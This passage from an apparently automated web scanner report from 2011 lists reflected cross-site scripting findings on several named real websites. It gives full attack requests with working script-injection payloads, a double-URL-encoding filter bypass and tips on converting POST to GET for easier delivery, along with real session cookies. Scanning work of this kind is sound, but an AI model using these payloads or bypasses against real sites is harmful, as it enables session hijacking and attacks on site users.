       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: fr/produits/eleve-jeune/gpi.aspxa9976"style="x:expr/**/ession(alert(1))"9fc951766a6">
...[SNIP]...

3.57. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1586%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252277ea5a6a870 was submitted in the REST URL parameter 1. This input was echoed as d1586"style="x:expr/**/ession(alert(1))"77ea5a6a870 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /imagesd1586%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252277ea5a6a870/favicon.ico HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.1.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9135
Date: Sun, 15 May 2011 13:18:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: imagesd1586"style="x:expr/**/ession(alert(1))"77ea5a6a870/favicon.ico">
...[SNIP]...

3.58. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b60%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25225b4ba2f362a was submitted in the REST URL parameter 2. This input was echoed as 91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /images/favicon.ico91b60%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25225b4ba2f362a HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.1.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9135
Date: Sun, 15 May 2011 13:18:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: images/favicon.ico91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a">
...[SNIP]...

3.59. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetnatrgovina.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3f5a6--><script>alert(1)</script>2a5a0ebd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?3f5a6--><script>alert(1)</script>2a5a0ebd0=1 HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:52 GMT; path=/; domain=internetnatrgovina.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 150351


       <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="si">
<head>

<!-- Bof products_new_glide module -->
<script type="text/javascript" src="jquery-1.2.3.pack.js">
...[SNIP]...
<a href="http://www.internetnatrgovina.com/index.php?3f5a6--><script>alert(1)</script>2a5a0ebd0=1&action=buy_now&products_id=3082" onclick="doBuyNowGet('http://www.internetnatrgovina.com/ajax_shopping_cart.php?3f5a6-->
...[SNIP]...

3.60. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetnatrgovina.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a3f"><script>alert(1)</script>8266b710003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21a3f"><script>alert(1)</script>8266b710003=1 HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:44 GMT; path=/; domain=internetnatrgovina.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 150781


       <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="si">
<head>

<!-- Bof products_new_glide module -->
<script type="text/javascript" src="jquery-1.2.3.pack.js">
...[SNIP]...
<OPTION VALUE="http://translate.google.com/translate?u=http://www.internetnatrgovina.com/?21a3f"><script>alert(1)</script>8266b710003=1&amp;sl=auto&amp;tl=de">
...[SNIP]...

3.61. http://www.mailsite.com/common/reporterror.asp [Company parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8e9"><script>alert(1)</script>a551140aa99 was submitted in the Company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=4b8e9"><script>alert(1)</script>a551140aa99&Name=&Email=&Phone=&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:57 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Company VALUE="4b8e9"><script>alert(1)</script>a551140aa99" SIZE=30 MAXLENGTH=30>
...[SNIP]...

3.62. http://www.mailsite.com/common/reporterror.asp [Email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1c99"><script>alert(1)</script>5f38dc1c19f was submitted in the Email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=&Email=f1c99"><script>alert(1)</script>5f38dc1c19f&Phone=&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Email VALUE="f1c99"><script>alert(1)</script>5f38dc1c19f" SIZE=30 MAXLENGTH=100>
...[SNIP]...

3.63. http://www.mailsite.com/common/reporterror.asp [Name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 163d0"><script>alert(1)</script>95fd9f3ee90 was submitted in the Name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=163d0"><script>alert(1)</script>95fd9f3ee90&Email=&Phone=&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:02 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1748


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Name VALUE="163d0"><script>alert(1)</script>95fd9f3ee90" SIZE=30 MAXLENGTH=30>
...[SNIP]...

3.64. http://www.mailsite.com/common/reporterror.asp [Phone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df93c"><script>alert(1)</script>1a295be864 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /common/reporterror.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298
Content-Length: 88

WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=&Email=&Phone=df93c"><script>alert(1)</script>1a295be864&Subject=&CallMe=Call+Me

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1747


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Phone VALUE="df93c"><script>alert(1)</script>1a295be864" SIZE=30 MAXLENGTH=30>
...[SNIP]...

3.65. http://www.mailsite.com/common/reporterror.asp [Subject parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the Subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfc8"><script>alert(1)</script>c1760f9a5931297f6 was submitted in the Subject parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /common/reporterror.asp?WebPage=UserRoomAccessIssue&LeadId=&Company=&Name=&Email=&Phone=&Subject=3bfc8"><script>alert(1)</script>c1760f9a5931297f6&CallMe=Call+Me HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:05:16 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1793


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE=TEXT NAME=Subject VALUE="3bfc8"><script>alert(1)</script>c1760f9a5931297f6" SIZE=30 MAXLENGTH=50>
...[SNIP]...

3.66. http://www.mailsite.com/common/reporterror.asp [WebPage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the WebPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 538a8"><script>alert(1)</script>541646c2d83ed52 was submitted in the WebPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /common/reporterror.asp?WebPage=UserRoomAccessIssue538a8"><script>alert(1)</script>541646c2d83ed52&LeadId=&Company=&Name=&Email=&Phone=&Subject=&CallMe=Call+Me HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/common/reporterror.asp?webpage=UserRoomAccessIssue
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1791


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssue538a8"><script>alert(1)</script>541646c2d83ed52">
...[SNIP]...

3.67. http://www.mailsite.com/common/reporterror.asp [webpage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the webpage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3060"><script>alert(1)</script>b8786e930d9 was submitted in the webpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/reporterror.asp?webpage=UserRoomAccessIssueb3060"><script>alert(1)</script>b8786e930d9 HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/download.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:40 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1787


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssueb3060"><script>alert(1)</script>b8786e930d9">
...[SNIP]...

3.68. http://www.mailsite.com/portal/trial.asp [Company parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3238"><script>alert(1)</script>590a7eea2a0860cbb was submitted in the Company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=c3238"><script>alert(1)</script>590a7eea2a0860cbb&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:09:37 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="30" maxlength="40" name="Company"
value="c3238"><script>alert(1)</script>590a7eea2a0860cbb" ID="Text7">
...[SNIP]...

3.69. http://www.mailsite.com/portal/trial.asp [Email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28d3"><script>alert(1)</script>067b77b653664807 was submitted in the Email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=d28d3"><script>alert(1)</script>067b77b653664807&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:38 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28259


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="30" maxlength="100" name="Email" value="d28d3"><script>alert(1)</script>067b77b653664807" ID="Text5">
...[SNIP]...

3.70. http://www.mailsite.com/portal/trial.asp [Email2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Email2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5024a"><script>alert(1)</script>c4dc73218bdf8135f was submitted in the Email2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

